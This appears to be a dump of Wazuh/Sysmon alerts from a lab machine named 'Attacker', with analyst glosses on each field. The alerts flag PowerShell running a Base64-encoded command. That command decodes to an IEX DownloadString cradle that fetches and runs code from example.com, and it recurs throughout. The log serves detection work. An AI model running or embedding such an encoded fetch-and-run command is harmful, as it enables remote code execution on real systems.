CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-c181-680a-eb0c-000000000e00}
ParentProcessId: 384
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:56:05.130 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c185-680a-ed0c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 15128 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-c181-680a-eb0c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 384 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 127 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535370.2781451 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:56:08.2961603Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 350611 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:56:08.275
ProcessGuid: {94294ddc-c185-680a-ed0c-000000000e00}
ProcessId: 15128
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_f1rrcy3r.32z.ps1
CreationUtcTime: 2025-04-24 22:56:08.275
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:56:08.275 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c185-680a-ed0c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 15128 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_f1rrcy3r.32z.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:56:08.275 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 124 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535372.2784220 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:56:11.0019319Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 350641 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:56:09.719
ProcessGuid: {94294ddc-c189-680a-f00c-000000000e00}
ProcessId: 2932
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-c185-680a-ed0c-000000000e00}
ParentProcessId: 15128
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:56:09.719 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c189-680a-f00c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 2932 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-c185-680a-ed0c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 15128 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 128 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535373.2792287 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:56:11.2971818Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 350642 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:56:11.257
ProcessGuid: {94294ddc-c189-680a-f00c-000000000e00}
ProcessId: 2932
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_pvs24fpt.wtt.ps1
CreationUtcTime: 2025-04-24 22:56:11.257
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:56:11.257 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c189-680a-f00c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 2932 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_pvs24fpt.wtt.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:56:11.257 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 125 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535376.2795052 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:56:13.9948115Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 350673 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:56:12.688
ProcessGuid: {94294ddc-c18c-680a-f20c-000000000e00}
ProcessId: 1724
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-c189-680a-f00c-000000000e00}
ParentProcessId: 2932
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:56:12.688 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c18c-680a-f20c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 1724 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
